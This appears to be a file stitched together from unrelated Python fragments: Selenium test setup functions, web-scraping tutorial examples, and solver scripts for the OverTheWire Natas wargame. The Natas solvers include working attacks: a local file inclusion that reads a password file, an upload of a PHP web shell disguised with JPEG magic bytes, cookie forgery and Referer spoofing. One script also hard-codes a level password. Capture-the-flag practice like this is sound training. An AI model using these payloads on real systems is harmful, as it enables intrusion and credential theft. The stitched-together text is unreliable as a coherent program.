def before():
    """Open the page under test and cache the blog list elements.

    Rebinds the module-level names ``driver``, ``blogs`` and ``rows`` so
    that later code in this module can use them, then checks the page
    title.
    """
    global driver, rows, blogs

    driver = base.set_browser()
    base.get_page(driver, page_url)

    blogs = base.find_element("blogs_list")
    # NOTE(review): ``find_elements_by_class_name`` looks like the legacy
    # Selenium helper -- confirm it exists in the pinned Selenium version.
    rows = blogs.find_elements_by_class_name("row")

    title = driver.title
    assert "Blogs " in title
def get_random_external_links(home_url):
    """Return one randomly chosen external link reachable from *home_url*.

    The page at *home_url* is fetched with ``get_page``. If it has
    external links (per ``get_external_links``), one of them is returned.
    Otherwise a random internal link (per ``get_internal_links``) is
    followed and the search repeats recursively from that page.

    Args:
        home_url: URL of the page to start from.

    Returns:
        A randomly selected external link, or ``None`` when *home_url* is
        empty, the page could not be fetched, or the page has neither
        external nor internal links.

    Note:
        The recursion has no depth limit; a site whose pages only link to
        each other can recurse until Python's recursion limit is hit.
    """
    if not home_url:
        return None

    bs = get_page(home_url)
    if not bs:
        return None

    # Parse once and reuse both components instead of re-parsing per use.
    parsed = urlparse(home_url)

    external_links = get_external_links(bs, parsed.netloc)
    if external_links:
        return random.choice(external_links)

    print('No External Links Found!!, Looking around the site for one')
    domain = f"{parsed.scheme}://{parsed.netloc}"
    internal_links = get_internal_links(bs, domain)
    if not internal_links:
        print('No Internal Links Found!!')
        return None

    # Hop to a random internal page and try again from there.
    return get_random_external_links(random.choice(internal_links))
def natas24():
    """Request page 24 with the ``?passwd[]=lol`` query and print the password.

    Prints the 32 word characters that follow ``"Password: "`` in the
    response, or a failure message when that text is not present.
    """
    username = "******"
    password = "******"

    # NOTE(review): the first argument is presumably the level number --
    # confirm against the get_page helper.
    page = get_page(24, username, password, "?passwd[]=lol")

    found = re.search(r"(?<=Password: )\w{32}", page)
    if found is not None:
        print(found.group(0))
        return
    print("Fail to find password")
def natas26():
    """Send the output of ``natas26.php`` as a cookie, then print ``img/pass.php``.

    Runs ``php natas26.php``; anything written to its stderr is treated as
    failure. Otherwise its stdout (newlines removed) is sent as the
    ``drawing`` cookie on a first request, and the content of a second
    request for ``img/pass.php`` is printed.
    """
    username = "******"
    password = "oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T"

    process = Popen("php natas26.php", shell=True, stdout=PIPE, stderr=PIPE)
    out, err = process.communicate()
    if err:
        print("Fail to find password")
        return

    payload = out.decode("utf-8").replace("\n", "")

    # The response of this first request is intentionally discarded; only
    # the follow-up request's content is printed.
    get_page(26, username, password, cookies={"drawing": payload})
    print(get_page(26, username, password, "img/pass.php"))
def natas7():
    """Request ``/etc/natas_webpass/natas8`` via the ``page`` parameter and print it.

    Prints the 32 word characters that directly follow ``<br>`` plus a
    newline in the response, or a failure message when no such text is
    found.
    """
    username = "******"
    password = "******"

    page = get_page(
        7,
        username,
        password,
        "/index.php?page=/etc/natas_webpass/natas8",
    )

    found = re.search(r"(?<=<br>\n)\w{32}", page)
    if found is not None:
        print(found.group(0))
        return
    print("Fail to find password")
def natas11():
    """Send the output of ``natas11.php`` as the ``data`` cookie and print the password.

    Runs ``php natas11.php``; anything written to its stderr is treated as
    failure. Otherwise its decoded stdout is sent as the ``data`` cookie
    and the 32 word characters following ``"The password for natas12 is "``
    in the response are printed.
    """
    username = "******"
    password = "******"

    process = Popen("php natas11.php", shell=True, stdout=PIPE, stderr=PIPE)
    out, err = process.communicate()
    if err:
        print("Fail to find password")
        return

    page = get_page(
        11,
        username,
        password,
        cookies={"data": out.decode("utf-8")},
    )

    found = re.search(r"(?<=The password for natas12 is )\w{32}", page)
    if found is not None:
        print(found.group(0))
        return
    print("Fail to find password")
def natas13():
    """Upload a PHP payload prefixed with JPEG magic bytes and print its output.

    Posts a file whose content starts with the bytes ``FF D8 FF E0``
    followed by a PHP snippet that runs ``cat /etc/natas_webpass/natas14``.
    The upload path reported in the response is then requested as bytes,
    and everything after the magic-byte prefix is decoded and printed.
    Prints a failure message when no upload path is found in the response.
    """
    username = "******"
    password = "******"

    # Leading magic bytes placed before the PHP code; the same prefix is
    # echoed back by the uploaded script and stripped before printing.
    magic = b'\xFF\xD8\xFF\xE0'
    payload = magic + b'<? echo passthru("cat /etc/natas_webpass/natas14"); ?>'

    data = {"MAX_FILE_SIZE": 1000, "filename": "evil.php"}
    files = {"uploadedfile": ("natas13.php", payload)}
    content = post_page(13, username, password, data=data, files=files)

    # The dot is escaped so only a literal ".php" suffix matches.
    found = re.search(r"upload/\S{10}\.php", content)
    if found is None:
        print("Fail to find password")
        return

    password_content = get_page(
        13, username, password, "/" + found.group(0), byte=True
    )
    # Drop the magic-byte prefix; its length is derived, not hard-coded.
    print(password_content[len(magic):].decode())
def natas6():
    """Read the secret from ``/includes/secret.inc``, submit it, print the password.

    Two steps, each of which prints a failure message and stops if its
    pattern is not found:

    1. Fetch ``/includes/secret.inc`` and take the word characters that
       follow ``secret = "``.
    2. Post that value as ``secret`` (with ``submit=Submit``) and print the
       word characters following ``"The password for natas7 is "``.
    """
    username = "******"
    password = "******"

    secret_page = get_page(6, username, password, "/includes/secret.inc")
    secret_match = re.search(r"(?<=secret = \")\w+", secret_page)
    if secret_match is None:
        print("Fail to find password")
        return

    form = {"secret": secret_match.group(0), "submit": "Submit"}
    result_page = post_page(6, username, password, data=form)

    password_match = re.search(r"(?<=The password for natas7 is )\w+", result_page)
    if password_match is not None:
        print(password_match.group(0))
        return
    print("Fail to find password")
def main():
    """Demonstrate BeautifulSoup tree navigation on the sample gift-list page.

    Fetches ``page3.html`` and prints, in order: the children of the
    ``giftList`` table, the next and previous siblings of its first row,
    the text of the cell preceding a specific image's parent, all images
    whose ``src`` matches a regular expression, and all tags that have
    exactly two attributes.
    """
    bs = get_page('http://www.pythonscraping.com/pages/page3.html')

    # Children vs. descendants:
    #   Children    - exactly one level below the parent.
    #   Descendants - any level below the parent.
    # All children are descendants, but not all descendants are children.
    print('------------------Children-------------------')
    # The same table is used by the three loops below, so look it up once.
    gift_table = bs.find('table', {'id': 'giftList'})
    for child in gift_table.children:
        print(child)

    print('------------------Next Siblings-------------------')
    # Next siblings of the first row: every row except the header row.
    for sibling in gift_table.tr.next_siblings:
        print(sibling)

    print('------------------Previous Siblings-------------------')
    # Previous siblings of the first row: prints nothing, because the
    # selected row is the first one.
    for sibling in gift_table.tr.previous_siblings:
        print(sibling)

    # Dealing with parents: from the image, go up to its parent and then to
    # the sibling just before that parent.
    print(
        bs.find('img', {
            'src': '../img/gifts/img1.jpg'
        }).parent.previous_sibling.get_text())

    # Regular expressions and BeautifulSoup: select images by their file
    # path rather than by tag position. A raw string keeps the backslashes
    # as regex escapes instead of invalid string escapes.
    images = bs.find_all(
        'img', {'src': re.compile(r'\.\.\/img\/gifts\/img.*\.jpg')})
    for image in images:
        print(image)

    # Lambda expressions: a function taking a tag and returning a boolean
    # can be passed to find_all as the filter.
    attributes = bs.find_all(lambda tag: len(tag.attrs) == 2)
    print(20 * '*' + 'Tags with 2 attributest' + 20 * '*' + '\n', attributes)
def get_links(pages, url=''):
    """Recursively crawl Wikipedia ``/wiki/`` links, printing details of each page.

    For the page at *url* this prints the ``h1`` text, the first paragraph
    inside ``mw-content-text`` and the ``href`` of the link inside
    ``ca-edit``. Every ``/wiki/`` link not already in *pages* is then added
    to *pages* and crawled in turn.

    Args:
        pages: Mutable set-like collection of already seen link paths;
            new paths are added to it in place via ``pages.add``.
        url: Path relative to ``http://en.wikipedia.org/``. A leading
            slash is accepted (e.g. ``'/wiki/Python'``).

    Note:
        The recursion has no depth limit, so a long crawl can exceed
        Python's recursion limit.
    """
    # Links are collected as '/wiki/...'; strip the leading slash so the
    # joined URL does not contain 'org//wiki/...'.
    url = f"http://en.wikipedia.org/{url.lstrip('/')}"
    bs_obj = get_page(url)
    if bs_obj is None:
        # NOTE(review): assumes get_page signals a failed fetch with None --
        # confirm. Without this guard a None page crashes in find_all below.
        return

    try:
        print(bs_obj.h1.get_text())
        print(
            bs_obj.find('', {
                'id': 'mw-content-text'
            }).find_all('p')[0].get_text())
        print(
            bs_obj.find('', {
                'id': 'ca-edit'
            }).find('span').find('a').attrs['href'])
    except AttributeError:
        # One of the lookups returned None; the page lacks that element.
        print('this link is missing something! Continuing')

    for link in bs_obj.find_all('a', href=re.compile('^(/wiki/)')):
        if 'href' in link.attrs and link.attrs['href'] not in pages:
            new_section = link.attrs['href']
            print('-' * 30 + '\n' + new_section)
            pages.add(new_section)
            get_links(pages, new_section)
# -*- coding: utf-8 -*-
# Request page 5 with the cookie ``loggedin=1`` and print the word that
# follows "natas6 is " in the response.
import re

from base import get_page

username = "******"
password = "******"
cookies = {"loggedin": "1"}

# NOTE(review): the first argument is presumably the level number --
# confirm against base.get_page.
content = get_page(5, username, password, cookies=cookies)

# ``password`` is rebound from the login credential to the regex match.
password = re.search(r"(?<=natas6 is )\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))
def before():
    """Open the page under test and check that its title mentions "Alerta".

    Rebinds the module-level ``driver`` so that later code in this module
    can use the browser.
    """
    global driver

    driver = base.set_browser()
    base.get_page(driver, page_url)

    title = driver.title
    assert "Alerta" in title
# -*- coding: utf-8 -*-
# Request ``/files/users.txt`` from page 2 and print the word that follows
# "natas3:" in the response.
import re

from base import get_page

username = "******"
password = "******"

# NOTE(review): the first argument is presumably the level number --
# confirm against base.get_page.
content = get_page(2, username, password, "/files/users.txt")

# ``password`` is rebound from the login credential to the regex match.
password = re.search(r"(?<=natas3:)\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))
# -*- coding: utf-8 -*-
# Request ``/s3cr3t/users.txt`` from page 3 and print the word that follows
# "natas4:" in the response.
import re

from base import get_page

username = "******"
password = "******"

# NOTE(review): the first argument is presumably the level number --
# confirm against base.get_page.
content = get_page(3, username, password, "/s3cr3t/users.txt")

# ``password`` is rebound from the login credential to the regex match.
password = re.search(r"(?<=natas4:)\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))
# -*- coding: utf-8 -*-
# Request page 4 with a ``Referer`` header pointing at the natas5 host and
# print the word that follows "natas5 is " in the response.
import re

from base import get_page

username = "******"
password = "******"
headers = {"Referer": "http://natas5.natas.labs.overthewire.org/"}

# NOTE(review): the first argument is presumably the level number --
# confirm against base.get_page.
content = get_page(4, username, password, headers=headers)

# ``password`` is rebound from the login credential to the regex match.
password = re.search(r"(?<=natas5 is )\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))
# -*- coding: utf-8 -*-
# Request page 1 and print the word that follows
# "The password for natas2 is " in the response.
import re

from base import get_page

username = "******"
password = "******"

# NOTE(review): the first argument is presumably the level number --
# confirm against base.get_page.
content = get_page(1, username, password)

# ``password`` is rebound from the login credential to the regex match.
password = re.search(r"(?<=The password for natas2 is )\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))
# CHAPTER 2 - Advanced HTML Parsing
from base import get_page

bs = get_page('http://www.pythonscraping.com/pages/warandpeace.html')

# find_all(tag, attributes, recursive, text, limit, keywords)
# ``find_all`` is the current spelling; ``findAll`` is only a legacy alias.
names = bs.find_all('span', {'class': 'green'})

# A set drops repeated names; iteration order is therefore not the
# document order.
names = {name.get_text() for name in names}
for name in names:
    print(name)

# Other BeautifulSoup objects:
#   BeautifulSoup object   - instance of BeautifulSoup
#   Tag object             - retrieved in lists or by calling find and find_all
#   NavigableString object - used to represent a string rather than a tag
#   Comment object         - used to find HTML comments
def before():
    """Open the page under test and check that its title mentions "Myjobs Visualizer".

    Rebinds the module-level ``driver`` so that later code in this module
    can use the browser.
    """
    global driver

    driver = base.set_browser()
    base.get_page(driver, page_url)

    title = driver.title
    assert "Myjobs Visualizer" in title